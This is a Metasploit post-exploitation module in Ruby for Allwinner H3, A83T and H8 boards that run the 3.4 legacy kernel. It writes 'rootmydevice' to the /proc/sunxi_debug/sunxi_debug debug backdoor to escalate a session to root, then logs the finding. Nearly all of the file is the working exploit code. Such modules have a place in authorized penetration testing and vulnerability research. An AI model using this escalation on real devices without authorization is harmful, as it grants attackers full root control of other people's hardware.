|
require "msf/core"
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::Priv
def initialize(info = {})
super(update_info(info,
"Name" => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
"Description" => %q{
This module attempts to exploit a debug backdoor privilege escalation in
Allwinner SoC based devices.
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
any for FriendlyARM's NanoPi M1,
SinoVoip's M2+ and M3,
Cuebietech's Cubietruck +
Linksprite's pcDuino8 Uno
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
},
"License" => MSF_LICENSE,
"Author" =>
[
"h00die <mike@stcyrsecurity.com>",
"KotCzarny"
],
"Platform" => [ "android", "linux" ],
"DisclosureDate" => "Apr 30 2016",
"References" =>
[
],
"SessionTypes" => [ "shell", "meterpreter" ]
))
end
def run
backdoor = "/proc/sunxi_debug/sunxi_debug"
if file_exist?(backdoor)
vprint_good "Backdoor found, exploiting."
cmd_exec("echo rootmydevice > #{backdoor}")
if is_root?
print_good "Privilege Escalation Successful"
report_vuln(
host: session.session_host,
name: self.name,
refs: self.references,
info: 'Escalated to root shell via Allwinner backdoor'
)
else
print_error "Privilege Escalation FAILED"
end
else
print_error "Backdoor #{backdoor} not found."
end
end
end
|
推荐
评论(0条)
